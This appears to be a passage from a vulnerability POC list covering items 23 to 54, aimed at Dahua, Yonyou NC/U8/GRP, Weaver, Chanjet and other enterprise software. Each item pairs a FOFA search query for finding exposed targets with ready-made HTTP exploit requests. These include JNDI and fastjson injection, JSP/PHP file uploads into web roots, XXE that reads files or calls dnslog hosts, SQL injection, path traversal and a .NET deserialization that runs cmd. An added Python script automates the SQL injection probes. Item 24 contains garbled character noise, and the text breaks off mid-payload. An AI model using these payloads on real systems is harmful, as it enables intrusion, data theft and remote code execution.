23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
 "a":{
 "@type":"com.alibaba.fastjson.JSONObject",
 {"@type":"java.net.URL","val":"http://DNSLOG"}
 }""
}

) c2 I7 C, o) z! l24. 用友NC 6.5 accept.jsp任意文件上传2 J* e8 B# u1 p; ~: G& T( A& Q
FOFA:icon_hash="1085941792"
* m Z4 r' b" A0 r2 r# U5 KPOST /aim/equipmap/accept.jsp HTTP/1.1
* R6 |# N7 b. C6 DHost: x.x.x.x
3 m1 J3 S. ~' j% z+ G! d( AUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.362 Y, t' w9 ^. V9 z4 z t$ o
Connection: close# q( A& \& i- Q
Content-Length: 449
! e: ?1 r7 _, r, }5 h1 K4 PAccept: */*
7 F3 e |4 U& Z" E8 HAccept-Encoding: gzip$ D% D* q: e- v6 ?3 a4 ?" I
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
2 p, g3 {: p. g8 W7 U8 d
* V8 ~- a/ s4 h9 g-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: c/ Y9 y# h. \! N6 `; ?Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
- d' v Y$ K% j+ g6 TContent-Type: text/plain
" c. B7 M) M: f$ D
+ F# G% a, {" S! I<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
9 N; {( x0 ~$ D3 l' a+ L- l2 ^8 l-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc' M; J7 Z/ z5 E: T. N& L# L% a! x7 Q
Content-Disposition: form-data; name="fname"
+ b' i% j2 C+ B! k. \
3 U' ?& ?5 S+ }3 l: y+ d5 b2 X\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
! P- o$ y: k# ~' i3 |/ n-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--9 `, e* [8 z$ ?$ @5 V: P7 |
) b: O( t( {( B' J" a; g: k. A
25. Yonyou NC registerServlet JNDI remote code execution
FOFA:app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

The dsname value is handed to a JNDI lookup. A DNS or LDAP callback to the dnslog host confirms the lookup; turning it into code execution depends on the target JDK's JNDI restrictions and on a usable gadget on the classpath, which this POC does not include.

26. Yonyou NC linkVoucher SQL injection
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

Time-based blind injection: a vulnerable host answers about five seconds late. The waitfor delay form is SQL Server syntax; the DBMS_PIPE.RECEIVE_MESSAGE form used in some of the following items is the Oracle equivalent, so pick the one matching the NC database backend.

27. Yonyou NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

Verify: the uploaded content is written to /uapim/static/pages/nc/head.jsp (the page for groupid=nc); request that path and look for the marker string.

29. Yonyou NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

The injection point is the billitem query parameter; the multipart body only has to be present so the handler reaches the vulnerable code path.

31. Yonyou NC runStateServlet SQL injection
Affected: version <= 6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. Yonyou NC complainbilldetail SQL injection
Affected: NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. Yonyou NC downTax/download SQL injection
Affected: NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. Yonyou NC warningDetailInfo SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

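Items 26 through 34 are all the same check against different Yonyou NC endpoints: inject a sleep and see whether the response is delayed. The script below is an added example for defenders doing the risk review this page is written for; it is not code from the source page or from Yonyou. It takes the GET endpoints and injection strings from items 26, 27, 29, 31, 32, 33 and 34 (item 30 is a multipart POST and is left out), and the same judgement applies to the later waitfor/DBMS_PIPE probes for GRP-U8, U8 Cloud and T+. The one thing the page does not say, and that matters on a loaded ERP host, is that a single slow response proves nothing: the check therefore sends a 0-second control probe and a 5-second probe per endpoint and only reports a hit when the difference reaches the requested delay. The base URL, the fetcher argument and simulated_fetch are this example's own assumptions.

```python
"""Time-based SQLi exposure check for the Yonyou NC endpoints in items 26-34.
Added example, not from the source page. Run with a base URL to test a host
you are authorised to test; run with no argument to exercise the logic
against the constructed simulated_fetch stand-in."""
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, List, Tuple

DELAY = 5  # seconds; the '0:0:5' / ',5)' sleep used throughout the page

# (path, injected parameter, backend family) copied from the items above.
# The pageId=login parameter the page sends alongside is kept.
NC_TIME_BASED: List[Tuple[str, str, str]] = [
    ("/portal/pt/yercommon/linkVoucher", "pkBill", "mssql"),            # item 26
    ("/ebvp/infopub/showcontent", "id", "oracle"),                       # item 27
    ("/portal/pt/erfile/down/bill", "id", "oracle"),                     # item 29
    ("/portal/pt/servlet/runStateServlet/doPost", "proDefPk", "mssql"),  # item 31
    ("/ebvp/advorappcoll/complainbilldetail", "pk_complaint", "mssql"),  # item 32
    ("/portal/pt/downTax/download", "classid", "mssql"),                 # item 33
    ("/ebvp/infopub/warningDetailInfo", "pkMessage", "mssql"),           # item 34
]


def sleep_payload(backend: str, seconds: int) -> str:
    """The page's own injection strings with the sleep length as a parameter."""
    if backend == "mssql":
        return f"1'waitfor delay '0:0:{seconds}'--"
    if backend == "oracle":
        return f"1' AND 4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),{seconds})--"
    raise ValueError(f"unknown backend {backend!r}")


def probe_url(base: str, path: str, param: str, backend: str, seconds: int) -> str:
    query = urllib.parse.urlencode({"pageId": "login", param: sleep_payload(backend, seconds)})
    return f"{base.rstrip('/')}{path}?{query}"


def timed_get(url: str, timeout: float = 30.0) -> float:
    """Default fetcher: GET the URL and return elapsed seconds. HTTP errors and
    timeouts are swallowed on purpose; a 500 that took five seconds is still a signal."""
    start = time.monotonic()
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            resp.read()
    except Exception:
        pass
    return time.monotonic() - start


def is_injectable(control_s: float, probe_s: float, delay: int = DELAY, slack: float = 1.0) -> bool:
    """Judge on the difference between the 0-second control and the delayed probe,
    not on absolute time, so a slow host alone does not produce a false hit."""
    return (probe_s - control_s) >= (delay - slack)


def check_host(base: str, fetch: Callable[[str], float] = timed_get) -> Dict[str, bool]:
    """Control + delayed probe for every endpoint; returns {path: injectable}."""
    results: Dict[str, bool] = {}
    for path, param, backend in NC_TIME_BASED:
        control = fetch(probe_url(base, path, param, backend, 0))
        probe = fetch(probe_url(base, path, param, backend, DELAY))
        results[path] = is_injectable(control, probe)
    return results


def simulated_fetch(vulnerable: bool, base_latency: float = 0.4) -> Callable[[str], float]:
    """Constructed stand-in for timed_get so the logic runs offline: a 'vulnerable'
    host honours the requested sleep (visible in the URL-encoded payload), an
    unaffected host answers with its base latency regardless of the payload."""
    def fetch(url: str) -> float:
        if vulnerable and (f"0%3A0%3A{DELAY}" in url or f"%2C{DELAY}%29" in url):
            return base_latency + DELAY
        return base_latency
    return fetch


if __name__ == "__main__":
    import sys
    live = len(sys.argv) > 1
    target = sys.argv[1] if live else "http://nc.example"
    fetch = timed_get if live else simulated_fetch(vulnerable=True)
    for path, hit in check_host(target, fetch).items():
        print(f"{'VULNERABLE' if hit else 'ok        '} {path}")
```

A host that is merely slow (say six seconds for every request) reports nothing, because the control probe is just as slow; only endpoints whose delay tracks the injected sleep are flagged.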
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: x.x.x.x:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

The filename field carries a relative path, so the file escapes the intended directory and lands in the nc_web web root; GET /1.jsp should then print 1234321. The accessToken is the HS512 JWT the POC ships with (its payload names userCode admin); whether it is accepted depends on the target's signing key.

36. Yonyou NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

In-band XXE: the entity reference is URL-encoded (%26xxe1two%3b) so it survives form decoding, and the formatted SOAP fault echoed back contains the contents of win.ini.

37. Yonyou NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
  <soapenv:Header/>
  <soapenv:Body>
    <iup:getResult>
      <!--type: string-->
      <iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
    </iup:getResult>
  </soapenv:Body>
</soapenv:Envelope>

Out-of-band XXE: the string parameter is parsed as XML a second time inside the service, and the parameter entity fetches the dnslog URL. Replace the dnslog host with one you control to confirm.

38. Yonyou U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p></vps></rpc>

39. Yonyou U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

Error-based on SQL Server: comparing the hex string to an integer raises a conversion error that echoes the MD5 of 123456 (e10adc3949ba59abbe56e057f20f883e) in the response.

40. Yonyou U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a></r>

41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

Stacked-query variant (the `');` closes the original statement before WAITFOR DELAY), so this only fires on SQL Server with batch execution allowed.

42. Yonyou GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

Verify: http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

(The multipart body is elided on the source page; the jatoolsreport URL is how the source checks that the uploaded file was written.)

43. Yonyou GRP-U8 userInfoWeb SQL injection (leading to RCE)
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

The userId value is concatenated into a SQL Server query with stacked statements allowed, which is why the source classes it as reaching code execution; the POC itself only demonstrates the five-second delay.

44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. Yonyou GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:222
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

Blind XXE via an external DTD reference: the parser fetches the DOCTYPE URL, which is enough for a DNS-based confirmation.

46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

Plain path traversal in fileName; the depth of ../ needed depends on where the download directory sits, and /etc/passwd implies a Linux deployment.

48. Yonyou U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855

------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
Content-Type: application/octet-stream

1231
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"

upload
------269520967239406871642430066855--

DontCheckLogin=1 in the query string is what makes this reachable without a session.

49. Yonyou U8 CRM uploadfile.php arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

The uploaded file is served from: http://x.x.x.x/tmpfile/updB3CB.tmp.php

(%s in the filename is left as on the source page, where it is a scanner-template placeholder; the server names the stored file itself, so the tmpfile path above is what to look for.)

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

MySQL error-based injection through the searchfield array key: the XPATH syntax error in the response carries ^e10adc3949ba59abbe56e057f20f883 (the MD5 of 123456, cut to extractvalue's 32-character limit).

51. Yunshikong (云时空) social commerce ERP validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. Weaver (泛微) E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

The tfs value is spliced in as a table name, which is why the payload starts by closing a backtick-quoted identifier; the MySQL version-comment syntax (/*!50000...*/) is there to slip past keyword filtering. A 32-character MD5 hash in the response confirms the union.

53. DPtech (迪普) VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

Note that the heading on the source page says file upload, but the only payload given is a URL-encoded directory traversal that reads /etc/passwd; treat it as a file-read check until a fuller POC is found.

54. Chanjet (畅捷通) T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the request below to the target. It runs a command that writes a marker string to a file:
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full request:
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
